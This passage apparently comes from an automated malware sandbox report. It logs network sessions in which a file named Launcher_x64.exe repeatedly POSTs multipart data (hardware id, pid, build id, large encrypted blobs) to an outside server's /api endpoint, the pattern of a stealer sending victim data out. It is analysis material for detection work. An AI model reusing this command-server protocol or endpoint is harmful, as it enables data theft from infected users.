                                                                                                                                                                                                                                                                                      2024-12-23 00:18:17 UTC1369INData Raw: 79 51 54 46 5a 76 51 45 6b 51 6b 47 75 68 6b 58 53 4e 66 4c 38 64 76 4b 44 77 4d 41 68 74 39 6b 38 35 67 47 71 30 65 79 38 6e 75 36 45 79 44 31 73 50 54 56 36 6b 4a 65 61 5a 49 73 35 77 67 68 32 6f 74 4d 6b 59 4d 69 7a 59 61 78 6d 39 4c 72 35 63 65 69 76 50 71 57 4a 47 61 55 49 4a 58 74 55 72 6f 4d 45 36 78 6e 37 33 47 72 66 36 6c 6c 35 78 4f 71 55 62 64 4e 63 2b 6a 52 56 32 4b 65 33 75 4b 67 55 73 44 78 64 65 77 79 76 68 67 6e 43 45 4e 72 51 49 70 66 33 77 4d 41 52 76 39 30 6b 31 6c 33 75 64 5a 56 46 38 2b 4b 42 38 55 48 52 65 52 56 44 62 5a 4f 62 5a 57 39 5a 34 39 79 48 6f 2b 74 5a 4f 65 79 48 46 53 79 32 4a 61 34 52 4b 49 6b 37 31 71 58 4e 42 63 6c 67 4b 58 74 55 72 6f 4d 45 36 78 48 37 33 47 72 66 36 6c 6c 35 78 4f 71 55 62 64 4e 63 2b 6a 52 56 32 4b
                                                                                                                                                                                                                                                                                      Data Ascii: yQTFZvQEkQkGuhkXSNfL8dvKDwMAht9k85gGq0ey8nu6EyD1sPTV6kJeaZIs5wgh2otMkYMizYaxm9Lr5ceivPqWJGaUIJXtUroME6xn73Grf6ll5xOqUbdNc+jRV2Ke3uKgUsDxdewyvhgnCENrQIpf3wMARv90k1l3udZVF8+KB8UHReRVDbZObZW9Z49yHo+tZOeyHFSy2Ja4RKIk71qXNBclgKXtUroME6xH73Grf6ll5xOqUbdNc+jRV2K
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:17 UTC1369INData Raw: 64 63 6b 49 4b 47 64 6c 4c 6f 5a 64 68 31 6e 37 33 45 75 62 69 6a 67 38 70 63 66 31 48 4a 4d 74 72 69 46 77 76 4a 37 75 67 4d 67 38 69 54 67 38 4f 6c 6d 53 68 7a 57 53 59 50 76 63 42 36 4b 4f 4f 47 47 4d 35 6f 77 5a 6a 6c 53 7a 4b 47 79 68 71 36 62 78 30 56 48 52 4d 51 69 43 6c 52 72 53 47 63 70 56 79 68 68 4f 69 72 4e 73 4e 4d 32 62 4f 64 67 36 56 61 34 4a 59 4c 56 6a 74 72 58 4a 5a 5a 51 39 4c 58 6f 4d 72 2f 73 46 50 68 44 65 6e 48 65 62 30 6a 67 4a 6a 4f 62 42 46 4d 59 42 38 6b 52 64 6f 63 2f 7a 75 62 52 6c 37 44 78 4e 65 77 7a 6a 6f 77 58 44 57 61 50 64 5a 71 4c 66 50 44 53 31 69 34 6c 6f 6c 68 48 71 52 48 46 46 58 31 72 78 31 52 32 45 4e 4e 42 4f 66 66 62 4f 43 63 70 45 4f 69 54 4f 30 76 64 34 4e 59 55 33 33 52 53 2b 35 55 71 56 4b 61 48 6d 35 69 48
                                                                                                                                                                                                                                                                                      Data Ascii: dckIKGdlLoZdh1n73Eubijg8pcf1HJMtriFwvJ7ugMg8iTg8OlmShzWSYPvcB6KOOGGM5owZjlSzKGyhq6bx0VHRMQiClRrSGcpVyhhOirNsNM2bOdg6Va4JYLVjtrXJZZQ9LXoMr/sFPhDenHeb0jgJjObBFMYB8kRdoc/zubRl7DxNewzjowXDWaPdZqLfPDS1i4lolhHqRHFFX1rx1R2ENNBOffbOCcpEOiTO0vd4NYU33RS+5UqVKaHm5iH


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      3192.168.2.449784172.67.157.2544433336C:\Users\user\Desktop\Launcher_x64.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:18 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=OMYEZFJQ2JXV
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 18134
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:18 UTC15331OUTData Raw: 2d 2d 4f 4d 59 45 5a 46 4a 51 32 4a 58 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 43 36 31 30 33 44 30 46 31 38 32 37 37 42 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 4f 4d 59 45 5a 46 4a 51 32 4a 58 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 4d 59 45 5a 46 4a 51 32 4a 58 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 0d 0a 2d 2d 4f 4d 59 45 5a 46 4a
                                                                                                                                                                                                                                                                                      Data Ascii: --OMYEZFJQ2JXVContent-Disposition: form-data; name="hwid"68C6103D0F18277B312F742701D40858--OMYEZFJQ2JXVContent-Disposition: form-data; name="pid"2--OMYEZFJQ2JXVContent-Disposition: form-data; name="lid"LPnhqo--swetamubcoyu--OMYEZFJ
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:18 UTC2803OUTData Raw: 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88
                                                                                                                                                                                                                                                                                      Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:19 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:19 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=jgirq34bjd1na4oph986h7fa27; expires=Thu, 17 Apr 2025 18:04:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H0JGqysR4Us9%2F7zt1m58xBC%2FzeR6FE2w8UdpIL4oMFgFZJK2FJMQHV%2Brl47Z3eK8b6XSmihsjgsTeeOMbFOt%2F%2Fg72aNz948A2emgDdRT%2FPqZl9wJQMv8WECtPG02VbpTrqg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642c73ebdd43df-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1663&rtt_var=648&sent=13&recv=21&lost=0&retrans=0&sent_bytes=2836&recv_bytes=19089&delivery_rate=1658148&cwnd=243&unsent_bytes=0&cid=2d5a8f490dad3ee1&ts=1002&x=0"
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      4192.168.2.449790172.67.157.2544433336C:\Users\user\Desktop\Launcher_x64.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:21 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=49MCAZNGRSS936MHK3O
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 8797
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:21 UTC8797OUTData Raw: 2d 2d 34 39 4d 43 41 5a 4e 47 52 53 53 39 33 36 4d 48 4b 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 43 36 31 30 33 44 30 46 31 38 32 37 37 42 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 34 39 4d 43 41 5a 4e 47 52 53 53 39 33 36 4d 48 4b 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 39 4d 43 41 5a 4e 47 52 53 53 39 33 36 4d 48 4b 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77
                                                                                                                                                                                                                                                                                      Data Ascii: --49MCAZNGRSS936MHK3OContent-Disposition: form-data; name="hwid"68C6103D0F18277B312F742701D40858--49MCAZNGRSS936MHK3OContent-Disposition: form-data; name="pid"2--49MCAZNGRSS936MHK3OContent-Disposition: form-data; name="lid"LPnhqo--sw
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:21 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:21 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=0as7ohk41nbhj75n05ucfesmtu; expires=Thu, 17 Apr 2025 18:05:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oj4YlETrPJBHq0m4qycvPi5BOT3EaezSl6N3RP6UW4bA2jhdRo%2FjGl9zf20Kl%2BUyjDuEuya7%2BlwMkjr88vBe8wJqldOqd5jQbjxbLrhUln3RPINWMoi5INvneMNU5Fr2dZ8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642c825c4143b6-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1728&rtt_var=664&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2834&recv_bytes=9736&delivery_rate=1627647&cwnd=224&unsent_bytes=0&cid=9ee9fad3f3adba8b&ts=685&x=0"
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      5192.168.2.449795172.67.157.2544433336C:\Users\user\Desktop\Launcher_x64.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:23 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=Q57AHR6AEG435T1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 20426
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:23 UTC15331OUTData Raw: 2d 2d 51 35 37 41 48 52 36 41 45 47 34 33 35 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 43 36 31 30 33 44 30 46 31 38 32 37 37 42 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 51 35 37 41 48 52 36 41 45 47 34 33 35 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 35 37 41 48 52 36 41 45 47 34 33 35 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: --Q57AHR6AEG435T1Content-Disposition: form-data; name="hwid"68C6103D0F18277B312F742701D40858--Q57AHR6AEG435T1Content-Disposition: form-data; name="pid"3--Q57AHR6AEG435T1Content-Disposition: form-data; name="lid"LPnhqo--swetamubcoyu
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:23 UTC5095OUTData Raw: 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:24 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:24 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=58fq91h8k108i7e4pasmn8nl3i; expires=Thu, 17 Apr 2025 18:05:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aomnSf9zBbtubRRzt50StRiZDvL21CR691nJ4BqBguSS2mI%2BPpbPfH2XgnYIcZEO57wacye29kcBf3VOdfkD4OdyeHnx9BYf2B9ZRRcCJ%2BL5r4mNNuFHBg0TI5Zs9s5DCTU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642c8fe9744261-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1736&rtt_var=652&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2834&recv_bytes=21384&delivery_rate=1676234&cwnd=239&unsent_bytes=0&cid=825f26e9e14b32be&ts=1270&x=0"
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      6192.168.2.449801172.67.157.2544433336C:\Users\user\Desktop\Launcher_x64.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:25 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=X3DIBSUGUL5J3X9DJ
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 1260
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:25 UTC1260OUTData Raw: 2d 2d 58 33 44 49 42 53 55 47 55 4c 35 4a 33 58 39 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 43 36 31 30 33 44 30 46 31 38 32 37 37 42 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 58 33 44 49 42 53 55 47 55 4c 35 4a 33 58 39 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 33 44 49 42 53 55 47 55 4c 35 4a 33 58 39 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62
                                                                                                                                                                                                                                                                                      Data Ascii: --X3DIBSUGUL5J3X9DJContent-Disposition: form-data; name="hwid"68C6103D0F18277B312F742701D40858--X3DIBSUGUL5J3X9DJContent-Disposition: form-data; name="pid"1--X3DIBSUGUL5J3X9DJContent-Disposition: form-data; name="lid"LPnhqo--swetamub
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:26 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 00:18:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=9p4hf7euqn6qfid91g6pibee2r; expires=Thu, 17 Apr 2025 18:05:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bJOzLbMsitPsrk%2Box72S02F5ek5CDLbVdI4WN2nwWr7PKXl8BIO2Y0qa8AsgK8bAlwDUclpaMmlrxEemjNSDEyTbwIZQk0CCP%2Fxj88BxkhtHO8y03n4v4CSuqJWfrHOyOu4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f642ca17d6242d2-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1758&rtt_var=663&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2175&delivery_rate=1660978&cwnd=227&unsent_bytes=0&cid=ff900414306cfb21&ts=772&x=0"
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      7192.168.2.449807172.67.157.2544433336C:\Users\user\Desktop\Launcher_x64.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:29 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=X0QYLC67LN
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 564957
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 00:18:29 UTC15331OUTData Raw: 2d 2d 58 30 51 59 4c 43 36 37 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 43 36 31 30 33 44 30 46 31 38 32 37 37 42 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 58 30 51 59 4c 43 36 37 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 30 51 59 4c 43 36 37 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 0d 0a 2d 2d 58 30 51 59 4c 43 36 37 4c 4e 0d 0a 43
                                                                                                                                                                                                                                                                                      Data Ascii: --X0QYLC67LNContent-Disposition: form-data; name="hwid"68C6103D0F18277B312F742701D40858--X0QYLC67LNContent-Disposition: form-data; name="pid"1--X0QYLC67LNContent-Disposition: form-data; name="lid"LPnhqo--swetamubcoyu--X0QYLC67LNC
